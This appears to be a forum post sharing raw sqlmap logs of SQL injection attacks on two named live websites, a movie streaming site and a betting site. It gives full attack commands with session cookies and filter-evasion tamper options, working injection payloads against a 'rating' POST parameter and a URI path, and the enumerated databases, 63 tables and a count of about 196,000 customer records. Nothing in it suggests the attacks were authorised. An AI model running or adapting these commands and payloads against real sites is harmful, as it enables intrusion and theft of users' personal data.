[05:38:16] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[05:38:16] [INFO] testing MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[05:38:16] [INFO] confirming MySQL
[05:38:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.33
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[05:38:16] [INFO] fetching database names
[05:38:16] [INFO] fetching number of databases
[05:38:16] [INFO] resumed: 2
[05:38:16] [INFO] retrieving the length of query output
[05:38:16] [INFO] retrieved:
[05:38:16] [INFO] retrieved:
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[05:38:17] [INFO] resuming partial value: info
[05:38:17] [WARNING] time-based comparison requires larger statistical model, please wait....................... (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:38:30] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[05:38:50] [INFO] adjusting time delay to 1 second due to good response times
rmation_schema
[05:40:26] [INFO] retrieving the length of query output
[05:40:26] [INFO] retrieved:
[05:40:27] [INFO] retrieved:
[05:40:27] [INFO] retrieved: admin_movie
available databases [2]:
[*] admin_movie
[*] information_schema

[05:41:50] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/ge.movie'

[*] ending @ 05:41:50 /2025-09-29/

(myenv) root@E02S29:~# sqlmap -u "https://ge.movie/profile/rating"   --data="action=set_rating&id=1993&rating=2&type=movie"   -p id   --cookie="auth=%7B%22id%22%3A%22195503%22%2C%22avatar%22%3A%22%5C%2Ftheme%5C%2Fweb%5C%2Fimg%5C%2F2.svg%22%2C%22name%22%3A%22pHqghUme%22%2C%22surname%22%3A%22%22%2C%22sex%22%3A%222%22%2C%22nickname%22%3Anull%2C%22email%22%3A%22testing%40example.com%22%7D; cf_clearance=sUojhqTnRxJ.AhbS91pESXaAY.GlQf1c63ZAHq5rHXE-1759047251-1.2.1.1-iiMUEqozkoIDe8w7wDAbEr5zlXb5fF02333jNDD_qbRyYvCCiOIG76dtTbAGehkagkw7tX9QW5mmM1ypX7diYxX2PaiUSyRfXorEFGgWVmTFQv2SaWmJw7VXLY8BDqDSSpmcD_HXhO.4MsKY1BC69pv3csTs8Ml_H2a8Nysmip.1kU4NWTGitvves94JqgnDS5NnD0PN9lSleDC_MTVGs4HDZPLipCUkPzsQncpomMA; ci_session=18edgs67pomjisip88v5obio6opsvu92; ref=https%3A%2F%2Fge.movie%2F"   --headers="X-Requested-With: XMLHttpRequest"   --referer="https://ge.movie/"   --dbms=mysql   --level=5   --risk=3   --batch --tamper=space2comment,between --random-agent --threads=10 -D admin_movie --tables
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.9#pip}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:42:04 /2025-09-29/

[05:42:04] [INFO] loading tamper module 'space2comment'
[05:42:04] [INFO] loading tamper module 'between'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[05:42:04] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[05:42:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: action=set_rating&id=1993' OR NOT 4225=4225 AND 'GyIM'='GyIM&rating=2&type=movie

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=set_rating&id=1993' AND (SELECT 2817 FROM (SELECT(SLEEP(5)))oeok) AND 'oawa'='oawa&rating=2&type=movie
---
[05:42:04] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[05:42:04] [INFO] testing MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[05:42:04] [INFO] confirming MySQL
[05:42:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.33
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[05:42:04] [INFO] fetching tables for database: 'admin_movie'
[05:42:04] [INFO] fetching number of tables for database 'admin_movie'
[05:42:04] [INFO] retrieved:
multi-threading is considered unsafe in time-based data retrieval. Are you sure of your choice (breaking warranty) [y/N] N
[05:42:05] [WARNING] time-based comparison requires larger statistical model, please wait.......................... (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:42:18] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[05:42:39] [INFO] adjusting time delay to 1 second due to good response times
63
[05:42:46] [INFO] retrieving the length of query output
[05:42:46] [INFO] retrieved:
[05:42:46] [INFO] retrieved:
[05:42:47] [INFO] retrieved: billing_plans
[05:44:32] [INFO] retrieving the length of query output
[05:44:32] [INFO] retrieved:
[05:44:32] [WARNING] reflective value(s) found and filtering out

[05:44:33] [INFO] retrieved:
[05:44:33] [INFO] retrieved: ci_sessions
[05:45:57] [INFO] retrieving the length of query output
[05:45:57] [INFO] retrieved:
[05:45:57] [INFO] retrieved:
[05:45:58] [INFO] retrieved: collections
[05:47:21] [INFO] retrieving the length of query output
[05:47:21] [INFO] retrieved:
[05:47:21] [INFO] retrieved:
[05:47:22] [INFO] retrieved: collections_subscribe
[05:49:53] [INFO] retrieving the length of query output
[05:49:53] [INFO] retrieved:
[05:49:54] [INFO] retrieved:
[05:49:54] [INFO] retrieved: collections_titles
[05:52:16] [INFO] retrieving the length of query output
[05:52:16] [INFO] retrieved:
[05:52:17] [INFO] retrieved:
[05:52:17] [INFO] retrieved: comments
[05:53:17] [INFO] retrieving the length of query output
[05:53:17] [INFO] retrieved:
[05:53:18] [INFO] retrieved:
[05:53:18] [INFO] retrieved: comments_like
[05:55:00] [INFO] retrieving the length of query output
[05:55:00] [INFO] retrieved:
[05:55:00] [INFO] retrieved:
[05:55:00] [INFO] retrieved: creditables
[05:56:09] [INFO] retrieving the length of query output
[05:56:09] [INFO] retrieved:
[05:56:10] [INFO] retrieved:
[05:56:10] [INFO] retrieved: css_themes
[05:57:28] [INFO] retrieving the length of query output
[05:57:28] [INFO] retrieved:
[05:57:29] [INFO] retrieved:
[05:57:29] [INFO] retrieved: csv_exports
[05:59:07] [INFO] retrieving the length of query output
[05:59:07] [INFO] retrieved:
[05:59:07] [INFO] retrieved:
[05:59:08] [INFO] retrieved: custom_domains
[06:00:56] [INFO] retrieving the length of query output
[06:00:56] [INFO] retrieved:
[06:00:57] [INFO] retrieved:
[06:00:57] [INFO] retrieved: custom_pages
[06:02:31] [INFO] retrieving the length of query output
[06:02:31] [INFO] retrieved:
[06:02:32] [INFO] retrieved:
[06:02:32] [INFO] retrieved: customers
[06:03:36] [INFO] retrieving the length of query output
[06:03:36] [INFO] retrieved:
[06:03:37] [INFO] retrieved:
[06:03:37] [INFO] retrieved: episodes
[06:04:36] [INFO] retrieving the length of query output
[06:04:36] [INFO] retrieved:
[06:04:36] [INFO] retrieved:
[06:04:37] [INFO] retrieved: favorites
[06:05:40] [INFO] retrieving the length of query output
[06:05:40] [INFO] retrieved:
[06:05:40] [INFO] retrieved:
[06:05:41] [INFO] retrieved: file_entries
[06:07:10] [INFO] retrieving the length of query output
[06:07:10] [INFO] retrieved:
[06:07:11] [INFO] retrieved:
[06:07:11] [INFO] retrieved: file_entry_models
[06:09:31] [INFO] retrieving the length of query output
[06:09:31] [INFO] retrieved:
[06:09:31] [INFO] retrieved:
[06:09:32] [INFO] retrieved: going_watches
[06:11:13] [INFO] retrieving the length of query output
[06:11:13] [INFO] retrieved:
[06:11:13] [INFO] retrieved:
[06:11:13] [INFO] retrieved: images
[06:11:49] [INFO] retrieving the length of query output
[06:11:49] [INFO] retrieved:
[06:11:50] [INFO] retrieved:
[06:11:50] [INFO] retrieved: invoices
[06:12:46] [INFO] retrieving the length of query output
[06:12:46] [INFO] retrieved:
[06:12:46] [INFO] retrieved:
[06:12:47] [INFO] retrieved: jobs
[06:13:17] [INFO] retrieving the length of query output
[06:13:17] [INFO] retrieved:
[06:13:17] [INFO] retrieved:
[06:13:18] [INFO] retrieved: links
[06:13:57] [INFO] retrieving the length of query output
[06:13:57] [INFO] retrieved:
[06:13:57] [INFO] retrieved:
[06:13:58] [INFO] retrieved: listables
[06:14:59] [INFO] retrieving the length of query output
[06:14:59] [INFO] retrieved:
[06:14:59] [INFO] retrieved:
[06:15:00] [INFO] retrieved: lists
[06:15:39] [INFO] retrieving the length of query output
[06:15:39] [INFO] retrieved:
[06:15:39] [INFO] retrieved:
[06:15:40] [INFO] retrieved: localizations
[06:17:12] [INFO] retrieving the length of query output
[06:17:12] [INFO] retrieved:
[06:17:13] [INFO] retrieved:
[06:17:13] [INFO] retrieved: migrations
[06:18:23] [INFO] retrieving the length of query output
[06:18:23] [INFO] retrieved:
[06:18:24] [INFO] retrieved:
[06:18:24] [INFO] retrieved: movies
[06:19:08] [INFO] retrieving the length of query output
[06:19:08] [INFO] retrieved:
[06:19:08] [INFO] retrieved:
[06:19:09] [INFO] retrieved: notification
[06:20:34] [INFO] retrieving the length of query output
[06:20:34] [INFO] retrieved:
[06:20:35] [INFO] retrieved:
[06:20:35] [INFO] retrieved: notification_subscriptions
[06:23:49] [INFO] retrieving the length of query output
[06:23:49] [INFO] retrieved:
[06:23:49] [INFO] retrieved:
[06:23:50] [INFO] retrieved: notifications
[06:25:22] [INFO] retrieving the length of query output
[06:25:22] [INFO] retrieved:
[06:25:23] [INFO] retrieved:
[06:25:23] [INFO] retrieved: password_resets
[06:27:19] [INFO] retrieving the length of query output
[06:27:19] [INFO] retrieved:
[06:27:20] [INFO] retrieved:
[06:27:20] [INFO] retrieved: people
[06:28:13] [INFO] retrieving the length of query output
[06:28:13] [INFO] retrieved:
[06:28:13] [INFO] retrieved:
[06:28:14] [INFO] retrieved: permissionables
[06:29:56] [INFO] retrieving the length of query output
[06:29:56] [INFO] retrieved:
[06:29:57] [INFO] retrieved:
[06:29:57] [INFO] retrieved: permissions
[06:31:18] [INFO] retrieving the length of query output
[06:31:18] [INFO] retrieved:
[06:31:18] [INFO] retrieved:
[06:31:19] [INFO] retrieved: personal_access_tokens
[06:34:08] [INFO] retrieving the length of query output
[06:34:08] [INFO] retrieved:
[06:34:09] [INFO] retrieved:
[06:34:09] [INFO] retrieved: populars
[06:35:15] [INFO] retrieving the length of query output
[06:35:15] [INFO] retrieved:
[06:35:16] [INFO] retrieved:
[06:35:16] [INFO] retrieved: problem_reports
[06:37:21] [INFO] retrieving the length of query output
[06:37:21] [INFO] retrieved:
[06:37:21] [INFO] retrieved:
[06:37:22] [INFO] retrieved: ratings
[06:38:11] [INFO] retrieving the length of query output
[06:38:11] [INFO] retrieved:
[06:38:11] [INFO] retrieved:
[06:38:12] [INFO] retrieved: reviews
[06:39:01] [INFO] retrieving the length of query output
[06:39:01] [INFO] retrieved:
[06:39:02] [INFO] retrieved:
[06:39:02] [INFO] retrieved: roles
[06:39:41] [INFO] retrieving the length of query output
[06:39:41] [INFO] retrieved:
[06:39:42] [INFO] retrieved:
[06:39:42] [INFO] retrieved: seasons
[06:40:31] [INFO] retrieving the length of query output
[06:40:31] [INFO] retrieved:
[06:40:32] [INFO] retrieved:
[06:40:32] [INFO] retrieved: serials
[06:41:17] [INFO] retrieving the length of query output
[06:41:17] [INFO] retrieved:
[06:41:17] [INFO] retrieved:
[06:41:18] [INFO] retrieved: settings
[06:42:18] [INFO] retrieving the length of query output
[06:42:18] [INFO] retrieved:
[06:42:19] [INFO] retrieved:
[06:42:19] [INFO] retrieved: social_profiles
[06:44:14] [INFO] retrieving the length of query output
[06:44:14] [INFO] retrieved:
[06:44:15] [INFO] retrieved:
[06:44:15] [INFO] retrieved: subscribes
[06:45:17] [INFO] retrieving the length of query output
[06:45:17] [INFO] retrieved:
[06:45:18] [INFO] retrieved:
[06:45:18] [INFO] retrieved: subscriptions
[06:46:53] [INFO] retrieving the length of query output
[06:46:53] [INFO] retrieved:
[06:46:53] [INFO] retrieved:
[06:46:53] [INFO] retrieved: taggables
[06:47:50] [INFO] retrieving the length of query output
[06:47:50] [INFO] retrieved:
[06:47:51] [INFO] retrieved:
[06:47:51] [INFO] retrieved: tags
[06:48:19] [INFO] retrieving the length of query output
[06:48:19] [INFO] retrieved:
[06:48:20] [INFO] retrieved:
[06:48:20] [INFO] retrieved: throttle
[06:49:28] [INFO] retrieving the length of query output
[06:49:28] [INFO] retrieved:
[06:49:28] [INFO] retrieved:
[06:49:29] [INFO] retrieved: titles
[06:50:14] [INFO] retrieving the length of query output
[06:50:14] [INFO] retrieved:
[06:50:15] [INFO] retrieved:
[06:50:15] [INFO] retrieved: user_role
[06:51:29] [INFO] retrieving the length of query output
[06:51:29] [INFO] retrieved:
[06:51:29] [INFO] retrieved:
[06:51:30] [INFO] retrieved: users
[06:52:05] [INFO] retrieving the length of query output
[06:52:05] [INFO] retrieved:
[06:52:06] [INFO] retrieved:
[06:52:06] [INFO] retrieved: users_oauth
[06:53:33] [INFO] retrieving the length of query output
[06:53:33] [INFO] retrieved:
[06:53:34] [INFO] retrieved:
[06:53:34] [INFO] retrieved: video_captions
[06:55:24] [INFO] retrieving the length of query output
[06:55:24] [INFO] retrieved:
[06:55:25] [INFO] retrieved:
[06:55:25] [INFO] retrieved: video_plays
[06:56:54] [INFO] retrieving the length of query output
[06:56:54] [INFO] retrieved:
[06:56:55] [INFO] retrieved:
[06:56:55] [INFO] retrieved: video_ratings
[06:58:34] [INFO] retrieving the length of query output
[06:58:34] [INFO] retrieved:
[06:58:35] [INFO] retrieved:
[06:58:35] [INFO] retrieved: video_reports
[07:00:22] [INFO] retrieving the length of query output
[07:00:22] [INFO] retrieved:
[07:00:22] [INFO] retrieved:
[07:00:23] [INFO] retrieved: videos
[07:01:07] [INFO] retrieving the length of query output
[07:01:07] [INFO] retrieved:
[07:01:07] [INFO] retrieved:
[07:01:08] [INFO] retrieved: videos_files
[07:02:40] [INFO] retrieving the length of query output
[07:02:40] [INFO] retrieved:
[07:02:41] [INFO] retrieved:
[07:02:41] [INFO] retrieved: watch_history
[07:04:26] [INFO] retrieving the length of query output
[07:04:26] [INFO] retrieved:
[07:04:26] [INFO] retrieved:
[07:04:27] [INFO] retrieved: workspace_invites
[07:06:35] [INFO] retrieving the length of query output
[07:06:35] [INFO] retrieved:
[07:06:36] [INFO] retrieved:
[07:06:36] [INFO] retrieved: workspace_user
[07:08:22] [INFO] retrieving the length of query output
[07:08:22] [INFO] retrieved:
[07:08:23] [INFO] retrieved:
[07:08:23] [INFO] retrieved: workspaces
Database: admin_movie
[63 tables]
+----------------------------+
| billing_plans              |
| ci_sessions                |
| collections                |
| collections_subscribe      |
| collections_titles         |
| comments                   |
| comments_like              |
| creditables                |
| css_themes                 |
| csv_exports                |
| custom_domains             |
| custom_pages               |
| customers                  |
| episodes                   |
| favorites                  |
| file_entries               |
| file_entry_models          |
| going_watches              |
| images                     |
| invoices                   |
| jobs                       |
| links                      |
| listables                  |
| lists                      |
| localizations              |
| migrations                 |
| movies                     |
| notification               |
| notification_subscriptions |
| notifications              |
| password_resets            |
| people                     |
| permissionables            |
| permissions                |
| personal_access_tokens     |
| populars                   |
| problem_reports            |
| ratings                    |
| reviews                    |
| roles                      |
| seasons                    |
| serials                    |
| settings                   |
| social_profiles            |
| subscribes                 |
| subscriptions              |
| taggables                  |
| tags                       |
| throttle                   |
| titles                     |
| user_role                  |
| users                      |
| users_oauth                |
| video_captions             |
| video_plays                |
| video_ratings              |
| video_reports              |
| videos                     |
| videos_files               |
| watch_history              |
| workspace_invites          |
| workspace_user             |
| workspaces                 |
+----------------------------+

[07:09:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/ge.movie'

[*] ending @ 07:09:35 /2025-09-29/

(myenv) root@E02S29:~# sqlmap -u "https://ge.movie/profile/rating"   --data="action=set_rating&id=1993&rating=2&type=movie"   -p id   --cookie="auth=%7B%22id%22%3A%22195503%22%2C%22avatar%22%3A%22%5C%2Ftheme%5C%2Fweb%5C%2Fimg%5C%2F2.svg%22%2C%22name%22%3A%22pHqghUme%22%2C%22surname%22%3A%22%22%2C%22sex%22%3A%222%22%2C%22nickname%22%3Anull%2C%22email%22%3A%22testing%40example.com%22%7D; cf_clearance=sUojhqTnRxJ.AhbS91pESXaAY.GlQf1c63ZAHq5rHXE-1759047251-1.2.1.1-iiMUEqozkoIDe8w7wDAbEr5zlXb5fF02333jNDD_qbRyYvCCiOIG76dtTbAGehkagkw7tX9QW5mmM1ypX7diYxX2PaiUSyRfXorEFGgWVmTFQv2SaWmJw7VXLY8BDqDSSpmcD_HXhO.4MsKY1BC69pv3csTs8Ml_H2a8Nysmip.1kU4NWTGitvves94JqgnDS5NnD0PN9lSleDC_MTVGs4HDZPLipCUkPzsQncpomMA; ci_session=18edgs67pomjisip88v5obio6opsvu92; ref=https%3A%2F%2Fge.movie%2F"   --headers="X-Requested-With: XMLHttpRequest"   --referer="https://ge.movie/"   --dbms=mysql   --level=5   --risk=3   --batch --tamper=space2comment,between --random-agent --threads=10 -D admin_movie -T customers,users --count
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:11:13 /2025-09-29/

[07:11:13] [INFO] loading tamper module 'space2comment'
[07:11:13] [INFO] loading tamper module 'between'
it appears that you might have mixed the order of tamper scripts. Do you want to auto resolve this? [Y/n/q] Y
[07:11:13] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:11:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: action=set_rating&id=1993' OR NOT 4225=4225 AND 'GyIM'='GyIM&rating=2&type=movie

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=set_rating&id=1993' AND (SELECT 2817 FROM (SELECT(SLEEP(5)))oeok) AND 'oawa'='oawa&rating=2&type=movie
---
[07:11:14] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[07:11:14] [INFO] testing MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[07:11:14] [INFO] confirming MySQL
[07:11:14] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.4.33
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[07:11:14] [INFO] retrieved:
[07:11:14] [WARNING] reflective value(s) found and filtering out
196168
[07:11:20] [INFO] retrieved: 3
Database: admin_movie
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| customers | 196168  |
| users     | 3       |
+-----------+---------+

[07:11:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/ge.movie'

[*] ending @ 07:11:21 /2025-09-29/

(myenv) root@E02S29:~#

MrDark · 29.09.2025

Код:

(myenv) root@E02S29:~# sqlmap -u "https://sattaz.com/guessing/kalyan" --delay=6 --dbs --risk=3 --level=5 --batch --random-agent
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:43:27 /2025-09-29/

[07:43:27] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:43:27] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[07:43:27] [INFO] testing connection to the target URL
[07:43:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:43:42] [INFO] testing if the target URL content is stable
[07:43:49] [INFO] target URL content is stable
[07:43:49] [INFO] testing if URI parameter '#1*' is dynamic
got a 302 redirect to 'https://sattaz.com/'. Do you want to follow? [Y/n] Y
[07:43:57] [INFO] URI parameter '#1*' appears to be dynamic
[07:44:03] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[07:44:10] [INFO] testing for SQL injection on URI parameter '#1*'
[07:44:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:44:32] [WARNING] reflective value(s) found and filtering out
[07:47:03] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[07:49:19] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[07:49:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:49:26] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[07:49:32] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[07:49:39] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[07:49:45] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[07:49:52] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[07:49:58] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[07:50:04] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[07:50:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:50:17] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:50:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:50:30] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:50:37] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:50:43] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[07:50:49] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:50:56] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[07:51:02] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[07:51:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[07:51:23] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[07:51:23] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[07:51:23] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[07:51:23] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[07:51:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[07:51:23] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[07:51:23] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[07:51:23] [INFO] testing 'Generic inline queries'
[07:51:29] [INFO] testing 'MySQL inline queries'
[07:51:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:51:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[07:51:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[07:51:56] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[07:52:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[07:52:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[07:52:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:52:54] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[07:52:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:52:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:53:09] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[07:53:44] [INFO] target URL appears to have 12 columns in query
[07:54:09] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 87 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 8075=8075 AND 'iChZ'='iChZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 7190 FROM (SELECT(SLEEP(5)))PBeK) AND 'tRMg'='tRMg

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766a71,0x7775535641746555495851446755626e584442734b6b675978484965466f45587252696751686542,0x7176706b71),NULL-- -
---
[07:54:18] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[07:55:20] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] performance_schema
[*] sattaz

[07:55:28] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 57 times
[07:55:28] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/sattaz.com'

[*] ending @ 07:55:28 /2025-09-29/

(myenv) root@E02S29:~# sqlmap -u "https://sattaz.com/guessing/kalyan" --risk=3 --level=5 --batch --random-agent -D sattaz --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:56:11 /2025-09-29/

[07:56:11] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
[07:56:11] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[07:56:11] [INFO] resuming back-end DBMS 'mysql'
[07:56:11] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 8075=8075 AND 'iChZ'='iChZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 7190 FROM (SELECT(SLEEP(5)))PBeK) AND 'tRMg'='tRMg

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162766a71,0x7775535641746555495851446755626e584442734b6b675978484965466f45587252696751686542,0x7176706b71),NULL-- -
---
[07:56:12] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
